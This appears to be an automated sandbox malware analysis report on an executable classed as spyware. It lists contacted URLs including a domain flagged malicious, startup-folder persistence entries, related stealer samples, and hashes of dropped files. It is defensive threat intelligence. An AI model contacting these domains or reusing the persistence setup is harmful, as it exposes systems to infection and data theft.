https://nocaryesmoto1.website/mapbhaebnd	Rzu_channel_debug.exe, 0000000B.00000003.2320487418.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2309309798.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2270513933.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2283066654.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2331116179.0000000000485000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://nocaryesmoto1.website/OIDH	Rzu_channel_debug.exe, 0000000B.00000003.2283066654.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2331116179.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2370658720.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2320487418.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2309495951.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2359786629.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2272868678.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2342963938.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2270513933.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2343858401.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2370328312.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2283242007.00000000004C7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://nocaryesmoto1.website/rCd	Rzu_channel_debug.exe, 0000000B.00000003.2320487418.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2309309798.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2342963938.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2343858401.0000000000485000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.manycam.com/codecVerdanaThis	file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000000.1702094709.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmp	false		unknown
https://nocaryesmoto1.website/kphmmid	Rzu_channel_debug.exe, 0000000B.00000003.2320487418.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2342963938.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2331116179.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2359786629.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2343858401.0000000000485000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://manycam.com/help/effects	ManyCam.exe, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmp	false		unknown
http://www.softwareok.de/?Download=Find.Same.Images.OK	cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2379403230.00000001401F4000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.vmware.com/0/	ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0	cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2379403230.00000001401F4000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.???.xx/?search=%s	ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000000.2000003324.00000001401E0000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.symauth.com/cps0(	ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Rzu_channel_debug.exe, 0000000B.00000002.2377933999.0000000007D9F000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.manycam.com	ManyCam.exe, ManyCam.exe, 00000003.00000000.1714817804.00000000005A4000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2147384434.00000000005A4000.00000002.00000001.01000000.00000011.sdmp	false		unknown
https://nocaryesmoto1.website/	Rzu_channel_debug.exe, 0000000B.00000003.2331116179.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2359786629.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2343858401.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2370658720.0000000000485000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.manycam.com/codecVerdanaTo	file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000000.1702094709.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmp	false		unknown
http://www.manycam.com/help/effects/snapshot/these	file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000000.1702094709.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmp	false		unknown
http://www.symauth.com/rpa00	ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://manycam.com/upload_effect?filepath=ManyCam	file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000000.1702094709.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmp	false		unknown
https://nocaryesmoto1.website/icy	Rzu_channel_debug.exe, 0000000B.00000003.2283066654.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2331116179.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2370658720.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2320487418.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2309495951.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2359786629.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2272868678.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2342963938.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2270513933.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2343858401.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2370328312.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2283242007.00000000004C7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.manycam.com0	file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000003.1710918732.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000003.1706209188.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000003.1706834191.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://download.manycam.comVerdanaThis	file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000000.1702094709.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmp	false		unknown
http://www.info-zip.org/	ManyCam.exe, 00000001.00000002.1717306561.000000000490D000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.000000000442F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.00000000055DA000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.00000000025F1000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.0000000004419000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://download.manycam.com	file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000003.1710918732.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714817804.00000000005A4000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2147384434.00000000005A4000.00000002.00000001.01000000.00000011.sdmp	false		unknown
http://www.manycam.comhttp://manycam.com/feedback/?version=%sAnchor	ManyCam.exe, 00000001.00000000.1702094709.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmp	false		unknown
http://download.manycam.com/effects/%s/%s?v=%sManyCam	file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000000.1702094709.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmp	false		unknown
https://support.mozilla.org	Rzu_channel_debug.exe, 0000000B.00000002.2377933999.0000000007D9F000.00000004.00001000.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377933999.0000000007D98000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://download.manycam.comNew	file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000000.1702094709.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmp	false		unknown
https://nocaryesmoto1.website:443/Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1P	Rzu_channel_debug.exe, 0000000B.00000003.2320636388.00000000004ED000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.surfok.de/	Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://nocaryesmoto1.website/Scoreboard-10-2.html	Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002CF3000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://nocaryesmoto1.website/UHx50n0S5FCP	Rzu_channel_debug.exe, 0000000B.00000003.2370328312.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2370658720.0000000000485000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.softwareok.com	ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000000.2000003324.00000001401E0000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	nocaryesmoto1.website	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1537836
Start date and time:	2024-10-19 19:52:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.spyw.expl.evad.winEXE@28/25@1/1
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 68 Number of non-executed functions: 259
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target ManyCam.exe, PID 5480 because there are no executed function
Execution Graph export aborted for target ManyCam.exe, PID 5856 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
13:53:54	API Interceptor	19x Sleep call for process: Rzu_channel_debug.exe modified
18:53:18	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT37C6.tmp
18:53:32	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rnm_Remote.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	ZP4KZDHVHWZZ2DC13DMX.exe	Get hash	malicious	Amadey	Browse	tipinfodownload-soft1.com/g9jvjfd73/index.php
	aQdB62N7SB.elf	Get hash	malicious	Shikitega, Xmrig	Browse	main.dsn.ovh/dns/loadbit
	PO#071024.exe	Get hash	malicious	FormBook	Browse	www.freedietbuilder.online/nnla/
	NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exe	Get hash	malicious	Unknown	Browse	www.ergeneescortg.xyz/guou/
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/DyuQ5y15/download
	Payment.cmd	Get hash	malicious	Azorult, DBatLoader	Browse	dsye.shop/DS341/index.php
	PO#001498.exe	Get hash	malicious	FormBook	Browse	www.freedietbuilder.online/nnla/?74=CqIQGQ0o8+jhRdpxbLSYPdAgtDYVEi+Bl2CfLfjcYft2NeK1a5UMcHptbiGPm/AWvx7/GdfV8RGwRyU2Pymh1JckOvVdcIiQ2qrvXFwlmsWwAHYeXtuMyAU=&jf=kjpL5
	Hesap-hareketleriniz10-15-2024.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/59fb/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	SecuriteInfo.com.Python.Stealer.1545.20368.28754.exe	Get hash	malicious	Python Stealer, CStealer	Browse	104.26.2.16
	WU0R8upP1n.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	KsAwFRk9Uy.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	WU0R8upP1n.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.206.204
	cAHHSnHDJS.exe	Get hash	malicious	Unknown	Browse	172.67.140.92
	cAHHSnHDJS.exe	Get hash	malicious	Unknown	Browse	172.67.140.92
	W9bx2457pK.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	s3AinXUzCx.exe	Get hash	malicious	LummaC	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	WU0R8upP1n.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	KsAwFRk9Uy.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	WU0R8upP1n.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	W9bx2457pK.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	s3AinXUzCx.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\RarSFX0\CrashRpt.dll	iieCxV2b1n.msi	Get hash	malicious	RedLine	Browse
	kvW4hZu9JA.msi	Get hash	malicious	Unknown	Browse
	PauizRq7By.msi	Get hash	malicious	RHADAMANTHYS	Browse
	XtDhwVrVKn.exe	Get hash	malicious	Unknown	Browse
	VqBVE8dJEA.exe	Get hash	malicious	Remcos	Browse
C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	iieCxV2b1n.msi	Get hash	malicious	RedLine	Browse
	kvW4hZu9JA.msi	Get hash	malicious	Unknown	Browse
	PauizRq7By.msi	Get hash	malicious	RHADAMANTHYS	Browse
	XtDhwVrVKn.exe	Get hash	malicious	Unknown	Browse
	VqBVE8dJEA.exe	Get hash	malicious	Remcos	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\9d221b6b

Download File

Process:	C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe
File Type:	data
Category:	dropped
Size (bytes):	5215852
Entropy (8bit):	7.672965910531662
Encrypted:	false
SSDEEP:	98304:SLP/dFz6hLN4OZWqZB8HSsBpjV722UB9IuxI+P9I6wDDOwEM:Sb/dgTCHSSpjk9B9BFPiXOwH
MD5:	A4B6B25910B0C92B244C90D20F6D7F96
SHA1:	D5DE82580AA3AE857151ECE5904ECDAA839D1C18
SHA-256:	AF689DD94C37BAFA898C67EC2AD224E66070BD23E4A7C99CBA73AB71CD48F5F1
SHA-512:	38C5055039B900190ACD9CC2449503C98D4E205E655C69CEC44D0A890B73F28F9C8F23DBC5DD432975EE1D63FC9340CE299477B2ED560D40BF54745DD37D840D
Malicious:	false
Preview:	..m...m...m...m...m.=.m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...l.<.=H].9Y<. qz..kv..DN..\|v..DJ..jm. }w.1Hk..jx..DJ..jm.....m...m...m...m...m...m...m...m...m...m...m.Z.$vp..yu..}\.m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m.Z..j\|..}P..lx..}..m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m.<.$V].?=E..{k..w..CV\.1^k..}n..s..m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m.o.C(7.]/+.m...m...m...m...m...m...m...m...m...m...m.

C:\Users\user\AppData\Local\Temp\RarSFX0\CrashRpt.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	123976
Entropy (8bit):	6.382577198291231
Encrypted:	false
SSDEEP:	3072:fzjKVg7GOfS5SqPcCXA4SQlah+8Z4OAAHWTtopW+Z:fzjKVg7GOESqPcCXxT8hhZ4OAAHW2Wa
MD5:	B2D1F5E4A1F0E8D85F0A8AEB7B8148C7
SHA1:	871078213FCC0CE143F518BD69CAA3156B385415
SHA-256:	C28E0AEC124902E948C554436C0EBBEBBA9FC91C906CE2CD887FADA0C64E3386
SHA-512:	1F6D97E02CD684CF4F4554B0E819196BD2811E19B964A680332268BCBB6DEE0E17B2B35B6E66F0FE5622DFFB0A734F39F8E49637A38E4FE7F10D3B5182B30260
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: iieCxV2b1n.msi, Detection: malicious, Browse Filename: kvW4hZu9JA.msi, Detection: malicious, Browse Filename: PauizRq7By.msi, Detection: malicious, Browse Filename: XtDhwVrVKn.exe, Detection: malicious, Browse Filename: VqBVE8dJEA.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................W.....U.....U.............U.......U.......U.....U.....U....Rich....................PE..L.....M...........!................'........ ......................................Gb..............................P........t..........d%..............H...........`$..............................0W..@............ ...............................text...8........................... ..`.rdata../l... ...n..................@..@.data...t...........................@....rsrc...d%.......&..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1756232
Entropy (8bit):	6.047140524753333
Encrypted:	false
SSDEEP:	49152:wlkcF8MnJ6tdGeHzpNTxlSvQynZAWBM2FU+SrzcBsWLZF5:wlf8MnJ6tdGeHzpNTxlSvfnOWC6U5Ed5
MD5:	BA699791249C311883BAA8CE3432703B
SHA1:	F8734601F9397CB5EBB8872AF03F5B0639C2EAC6
SHA-256:	7C4EB51A737A81C163F95B50EC54518B82FCF91389D0560E855F3E26CEC07282
